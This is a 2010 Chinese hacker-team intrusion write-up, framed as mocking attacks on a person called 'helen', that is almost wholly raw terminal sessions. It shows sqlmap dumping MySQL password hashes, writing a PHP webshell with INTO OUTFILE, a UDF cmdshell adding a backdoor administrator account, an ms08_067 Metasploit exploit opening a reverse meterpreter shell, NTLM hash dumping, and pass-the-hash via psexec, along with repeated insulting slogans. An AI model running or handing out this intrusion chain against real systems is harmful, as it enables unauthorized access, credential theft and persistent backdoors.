|
-----------------------------------------------------------------------------
草尼马入侵记 - helen他全家都是黑客! (我只是个程序员 BY helen)
-----------------------------------------------------------------------------
劝君莫惜金缕衣,劝君惜取少年时。
花开堪折直须折,莫待无花空折枝。
┏┓ ┏┓
┏━━┛┻━━━┛┻━━┓
┃ 王 ┃
┃ ━ ┃
┃ ┳━┛ ┗━┳ ┃
┃ ┃
┃ ┻ ┃
┃ ┃
┗━━┓ ┏━━┛
┃ ┃
┃ ┃
┃ ┗━━━━━┓
┃ ┣┓
┃ ┏┛
┗━┓┓┏━━━┳┓┏━┛
┃┫┫ ┃┫┫
┗┻┛ ┗┻┛ //作者:九区四神兽之草尼马(Dis9 Team) (・´ェ`・) 2010年 小雨
-----------------------------------------------------------------------------------
///////////////////////////////////
0x1 独坐幽篁里
///////////////////////////////////
[scan start]-----/fuckhelen/---helen is sb----/fuckhelen/XX/
root@bt:~# nmap -sV -PN www.fuck-helen.com
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-07-15 23:32 EDT
Nmap scan report for www.fuck-helen.com (220.214.21.235)
Host is up (0.00082s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.0.63 ((Win32) PHP/5.2.14)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 08:00:27:B2:CD:BD (Cadmus Computer Systems)
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.34 seconds
root@bt:~# perl scan.pl
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Admin
xxx
website:www.hkmjj.com
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Enter the website you want to scan
e.g.: www.hkmjj.com or www.hkmjj.com/admin
--> www.fuck-helen.com
Enter the coding language of the website
e.g.: asp, php, cfm, any
--> php
->The website: http://www.fuck-helen.com/
->Source of the website: php
->Scan of the admin control panel is progressing...
[-] Not Found <- http://www.fuck-helen.com/_admin/
[-] Not Found <- http://www.fuck-helen.com/backoffice/ [+] Found -> http://www.fuck-helen.com/phpinfo.php
Congratulation, this admin login page is working.
[scan end ]-----/fuckhelen/---helen is sb----/fuckhelen/XX/
[phpinfo start]-----/fuckhelen/---helen is sb----/fuckhelen/XX/
root@bt:~# http://www.fuck-helen.com/phpinfo.php
root@bt:~# cat phpinfo.php | grep SCRIPT_FILENAME
SCRIPT_FILENAME
C:/w/htdocs/phpinfo.php
_SERVER["SCRIPT_FILENAME"]
C:/w/htdocs/phpinfo.php
[phpinfo end]
[sqlmap start]
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://www.fuck-helen.com/index.php?id=1"
sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 23:51:32
[23:51:32] [INFO] using '/pentest/database/sqlmap/output/www.fuck-helen.com/session' as session file
[23:51:32] [INFO] testing connection to the target url
[23:51:32] [INFO] testing if the url is stable, wait a few seconds
[23:51:33] [INFO] url is stable
[23:51:33] [INFO] testing if GET parameter 'id' is dynamic
[23:51:33] [INFO] confirming that GET parameter 'id' is dynamic
[23:51:33] [INFO] GET parameter 'id' is dynamic
[23:51:33] [INFO] (error based) heuristics shows that GET parameter 'id' is injectable (possible DBMS: MySQL)
[23:51:33] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[23:51:33] [INFO] testing unescaped numeric (AND) injection on GET parameter 'id'
[23:51:33] [INFO] confirming unescaped numeric (AND) injection on GET parameter 'id'
[23:51:33] [INFO] GET parameter 'id' is unescaped numeric (AND) injectable with 0 parenthesis
[23:51:33] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[23:51:33] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[23:51:33] [INFO] testing for parenthesis on injectable parameter
[23:51:34] [INFO] the injectable parameter requires 0 parenthesis
[23:51:34] [INFO] testing MySQL
[23:51:34] [INFO] confirming MySQL
[23:51:35] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.0.63, PHP 5.2.14
back-end DBMS: MySQL >= 5.0.0
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://www.fuck-helen.com/index.php?id=1" --passwords
sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 00:00:38
[00:00:39] [INFO] using '/pentest/database/sqlmap/output/www.fuck-helen.com/session' as session file
[00:00:39] [INFO] resuming injection point 'GET' from session file
[00:00:39] [INFO] resuming injection parameter 'id' from session file
[00:00:39] [INFO] resuming injection type 'numeric' from session file
[00:00:39] [INFO] resuming match ratio '0.941' from session file
[00:00:39] [INFO] resuming 0 number of parenthesis from session file
[00:00:39] [INFO] resuming back-end DBMS 'mysql 5' from session file
[00:00:39] [INFO] testing connection to the target url
[00:00:39] [INFO] testing for parenthesis on injectable parameter
[00:00:39] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.0.63, PHP 5.2.14
back-end DBMS: MySQL 5
[00:00:39] [INFO] fetching database users password hashes
[00:00:39] [INFO] fetching database users
[00:00:39] [INFO] fetching number of database users
[00:00:39] [INFO] read from file '/pentest/database/sqlmap/output/www.fuck-helen.com/session': 3
[00:00:39] [INFO] read from file '/pentest/database/sqlmap/output/www.fuck-helen.com/session': 'root'@'localhost'
[00:00:39] [INFO] read from file '/pentest/database/sqlmap/output/www.fuck-helen.com/session': 'woaicangjingkong'@'localhost'
[00:00:39] [INFO] read from file '/pentest/database/sqlmap/output/www.fuck-helen.com/session': 'cangjingkong'@'localhost'
[00:00:39] [INFO] fetching number of password hashes for user 'root'
[00:00:39] [INFO] retrieved: 1
[00:00:39] [INFO] fetching password hashes for user 'root'
[00:00:39] [INFO] retrieved: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[00:00:46] [INFO] fetching number of password hashes for user 'woaicangjingkong'
[00:00:46] [INFO] retrieved: 1
[00:00:46] [INFO] fetching password hashes for user 'woaicangjingkong'
[00:00:46] [INFO] retrieved: *D2344FAF775433E007EB99FBFAF7DDE258A3AEBB
[00:00:58] [INFO] fetching number of password hashes for user 'cangjingkong'
[00:00:58] [INFO] retrieved: 1
[00:00:58] [INFO] fetching password hashes for user 'cangjingkong'
[00:00:58] [INFO] retrieved: *093E39878BBF4673AB70C14EEB4A86EE899E12E2
database management system users password hashes:
[*] cangjingkong [1]:
password hash: *093E39878BBF4673AB70C14EEB4A86EE899E12E2
[*] root [1]:
password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*] woaicangjingkong [1]:
password hash: *D2344FAF775433E007EB99FBFAF7DDE258A3AEBB
[00:01:10] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.fuck-helen.com'
[*] shutting down at: 00:01:10
[sqlmap end]-----/fuckhelen/---helen is sb----/fuckhelen/XX/
[mysql get shell start]-----/fuckhelen/---helen is sb----/fuckhelen/XX/
================================================================
mysql hash ==> md5.org
===============
password hash: *093E39878BBF4673AB70C14EEB4A86EE899E12E2=sbishelen
================
root@bt:~# mysql -u root -h www.fuck-helen.com -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1810
Server version: 5.0.90-community-nt MySQL Community Edition (GPL)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| cangjingkong |
| mysql |
| phpzr |
| root |
| test |
| woaicangjingkong |
+--------------------+
7 rows in set (0.00 sec)
mysql> use test;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> CREATE TABLE GETSHELL (GETSHELL TEXT NOT NULL);
Query OK, 0 rows affected (0.07 sec)
mysql> INSERT INTO GETSHELL VALUES ('
');
Query OK, 1 row affected (0.00 sec)
mysql> SELECT * FROM GETSHELL into outfile 'C:/w/htdocs/sbishelen.php';
[mysql get shell end]-----/fuckhelen/---helen is sb----/fuckhelen/XX/
[mysql udf.dll get system] -----/fuckhelen/---helen is sb----/fuckhelen/XX/
create function cmdshell returns string soname 'udf.dll'
select cmdshell('net user helennimashiji 123456 /add');
select cmdshell('net localgroup administrators helennimashiji /add');
select cmdshell('c:\3389.exe');
drop function cmdshell;
[mysql udf.dll get system end] -----/fuckhelen/---helen is sb----/fuckhelen/XX/
============================
login fuck-helen.com 3389
reverse proxy . me pc 。继续fuck helen..
我只是一个程序员。。。 by helen .
=============================
///////////////////////////////////
0x2 劝君惜取少年时
///////////////////////////////////
继续FUCK HELEN 。。。。。
[info start]-----/fuckhelen/---helen is sb----/fuckhelen/XX/
root@bt:~# nmap -v -sn 192.168.56.0-254
Scanning 152 hosts [1 port/host]
Completed ARP Ping Scan at 00:58, 1.62s elapsed (152 total hosts)
Initiating Parallel DNS resolution of 152 hosts. at 00:58
Completed Parallel DNS resolution of 152 hosts. at 00:59, 13.00s elapsed
Nmap scan report for 192.168.56.101
Nmap scan report for 192.168.56.104
Nmap scan report for 192.168.56.106
[info end]-----/fuckhelen/---helen is sb----/fuckhelen/X
////////////////////////////////////////////////////////////
/
/f0ck 192.168.56.106 start
(・´ェ`・)
|
| |
|---------
| |
|---------
| |
你全家都是黑客
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
root@bt:~# nmap -v A 192.168.56.106
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-07-16 01:07 EDT
Failed to resolve given hostname/IP: A. Note that you can't use '/mask' AND '1-4,7,100-' style IP ranges
Initiating ARP Ping Scan at 01:07
Scanning 192.168.56.106 [1 port]
Completed ARP Ping Scan at 01:07, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:07
Completed Parallel DNS resolution of 1 host. at 01:07, 13.00s elapsed
Initiating SYN Stealth Scan at 01:07
Scanning 192.168.56.106 [1000 ports]
Discovered open port 80/tcp on 192.168.56.106
Discovered open port 135/tcp on 192.168.56.106
Discovered open port 445/tcp on 192.168.56.106
Discovered open port 139/tcp on 192.168.56.106
Discovered open port 3306/tcp on 192.168.56.106
Completed SYN Stealth Scan at 01:07, 0.34s elapsed (1000 total ports)
Nmap scan report for 192.168.56.106
Host is up (0.0046s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27:B2:CD:BD (Cadmus Computer Systems)
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.45 seconds
Raw packets sent: 1001 (44.028KB) | Rcvd: 1002 (40.124KB)
--------------------------------------------------------------------------
[list users]
root@bt:/usr/share/nmap/scripts# nmap --script=smb-enum-users 192.168.56.106
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-07-16 01:20 EDT
Nmap scan report for 192.168.56.106
Host is up (0.0011s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27:B2:CD:BD (Cadmus Computer Systems)
Host script results:
| smb-enum-users:
| DIS9TEAM-7A9CFB\Administrator (RID: 500)
| DIS9TEAM-7A9CFB\dis9team (RID: 1003)
| DIS9TEAM-7A9CFB\Guest (RID: 501)
| DIS9TEAM-7A9CFB\helen (RID: 1004)
| DIS9TEAM-7A9CFB\HelpAssistant (RID: 1000)
|_ DIS9TEAM-7A9CFB\SUPPORT_388945a0 (RID: 1002)
Nmap done: 1 IP address (1 host up) scanned in 14.59 seconds
[list users end ]
///// look : DIS9TEAM-7A9CFB\helen (RID: 1004)
[start metasploit]
root@bt:~# msfconsole
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 635 exploits - 316 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11089 updated 236 days ago (2010.11.22)
Warning: This copy of the Metasploit Framework was last updated 236 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
n]
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.106
RHOST => 192.168.56.106
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.56.106 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, none, process
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > ifconfig
[*] exec: ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:56:5b:d4
inet addr:192.168.56.102 Bcast:192.168.56.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe56:5bd4/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:201015 errors:33 dropped:0 overruns:0 frame:0
TX packets:208250 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:26801873 (26.8 MB) TX bytes:28666911 (28.6 MB)
Interrupt:10 Base address:0xd020
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:4303 errors:0 dropped:0 overruns:0 frame:0
TX packets:4303 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:202067 (202.0 KB) TX bytes:202067 (202.0 KB)
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.102
RHOST => 192.168.56.102
msf exploit(ms08_067_netapi) > set TARGET 15
TARGET => 15
msf exploit(ms08_067_netapi) > exploit
[-] Exploit failed: The following options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.56.102 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, none, process
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
15 Windows XP SP2 Chinese - Simplified (NX)
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.106
RHOST => 192.168.56.106
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.102
LHOST => 192.168.56.102
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.102:4444
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.56.106
[*] Meterpreter session 1 opened (192.168.56.102:4444 -> 192.168.56.106:1045) at Sat Jul 16 01:47:51 -0400 2010
meterpreter > hashdump
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
dis9team:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
helen:1004:d7959a227e45d740aad3b435b51404ee:8592e1331718673b0ee32df3c0153456:::
HelpAssistant:1000:80bc20a07acda04492cb562c07e825d3:dc07f108fcfe7eb5bcddb010d581cdb0:::
SUPPORT_388945a0q:1002:aad3b435b51404eeaad3b435b51404ee:583313911d6bb8dd0fbb89144a9f96e9:::
meterpreter >
[metasploit end ]
/////////////////////f0ck 192.168.56.106 end ////////////////////////
////////////////////////////////////////////////////////////
/
/f0ck 192.168.56.101 start
/..┏┓ ┏┓
/┏┛┻━━━┛┻┓
/┃ ┃
/┃ ━ ┃
/┃ ┳┛ ┗┳ ┃
/┃ ┃
/┃ ┻ ┃
/┃ ┃
/┗━┓ ┏━┛
/ ┃ ┃
/ ┃ ┃
/ ┃ ┗━━━┓
/ ┃ ┣┓
/ ┃ ┏┛
/ ┗┓┓┏━┳┓┏┛
/ ┃┫┫ ┃┫┫ 在荒茫而美丽的马勒戈壁上。生活着一群顽强的草泥马。
/ ┗┻┛ ┗┻┛
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
[info 192.168.56.106]
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.102:4444
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.56.106
[*] Meterpreter session 1 opened (192.168.56.102:4444 -> 192.168.56.106:1045) at Sat Jul 16 01:47:51 -0400 2010
meterpreter > hashdump
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
dis9team:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
helen:1004:d7959a227e45d740aad3b435b51404ee:8592e1331718673b0ee32df3c0153456:::
HelpAssistant:1000:80bc20a07acda04492cb562c07e825d3:dc07f108fcfe7eb5bcddb010d581cdb0:::
SUPPORT_388945a0q:1002:aad3b435b51404eeaad3b435b51404ee:583313911d6bb8dd0fbb89144a9f96e9:::
meterpreter >
[end info]
[hash fuck]
msf exploit(psexec) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(psexec) > set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
SMBPass => 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(psexec) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.56.101 yes The target address
RPORT 445 yes Set the SMB service port
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 no The password for the specified username
SMBUser Administrator no The username to authenticate as
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, none, process
LPORT 4444 yes The listen port
RHOST 192.168.56.101 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(psexec) > exploit
msf exploit(psexec) > exploit
[*] Started bind handler
[*] Uploading payload
[*] Created wRAGxeKp.exe
[*] Obtaining a service manager handle
[*] Creating a new service (bbULKlnn - "Mn0aWrz")
[*] Closing service handle
[*] Opening service
[*] Starting the service
[*] Removing the servic.....
.. more......
meterpreter >
[end hash]
|
推荐
评论(1条)
